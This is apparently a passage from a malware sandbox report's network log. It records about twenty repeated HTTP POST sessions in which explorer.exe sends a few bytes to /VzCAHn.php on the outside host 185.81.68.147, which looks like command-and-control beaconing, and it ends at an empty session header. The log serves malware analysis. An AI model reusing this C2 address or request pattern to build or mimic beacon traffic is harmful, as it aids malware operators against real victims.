                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      37192.168.2.849769185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:47.676728010 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:47.799390078 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:49.290792942 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:48 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      38192.168.2.849775185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:49.549428940 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:49.669430017 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:50.965301037 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:50 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      39192.168.2.849781185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:51.193181038 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:51.314794064 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:52.870004892 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:51 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      40192.168.2.849787185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:53.148647070 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:53.268572092 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:54.763447046 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:53 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      41192.168.2.849793185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:54.989403009 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:55.110979080 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:56.602355003 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:55 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      42192.168.2.849794185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:56.833827019 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:56.953833103 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:16:58.301479101 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:57 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      43192.168.2.849800185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:16:58.596677065 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:16:58.740370989 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:00.046148062 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:16:59 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      44192.168.2.849806185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:00.270473003 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:00.390341043 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:01.721995115 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:00 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      45192.168.2.849807185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:01.957597971 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:02.077372074 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:03.782963991 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:02 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      46192.168.2.849813185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:04.020422935 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:04.141817093 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:05.628029108 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:04 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      47192.168.2.849815185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:05.896202087 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:06.016599894 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:07.507989883 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:06 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      48192.168.2.849821185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:07.743040085 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:07.862929106 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:09.367067099 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:08 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      49192.168.2.849826185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:09.650841951 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:09.770560980 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:11.261035919 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:10 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      50192.168.2.849832185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:11.488917112 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:11.612035036 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:12.946894884 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:12 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      51192.168.2.849835185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:13.176224947 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:13.296237946 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:14.635188103 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:13 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      52192.168.2.849839185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:14.913727999 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:15.034713984 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:16.354700089 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:15 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      53192.168.2.849845185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:16.582725048 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:16.703016996 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:18.026817083 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:17 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      54192.168.2.849851185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:18.257831097 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:18.377563000 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:19.715701103 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:18 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      55192.168.2.849852185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:19.942269087 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:20.062411070 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:21.389767885 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:20 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      56192.168.2.849858185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 15, 2024 09:17:21.619057894 CET278OUTPOST /VzCAHn.php?65D35BAB97073674480464 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 15, 2024 09:17:21.739324093 CET6OUTData Raw: 13 0c 0d 56
                                                                                                                                                                                                                      Data Ascii: V
                                                                                                                                                                                                                      Dec 15, 2024 09:17:23.074635029 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Sun, 15 Dec 2024 16:17:22 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      57192.168.2.849864185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
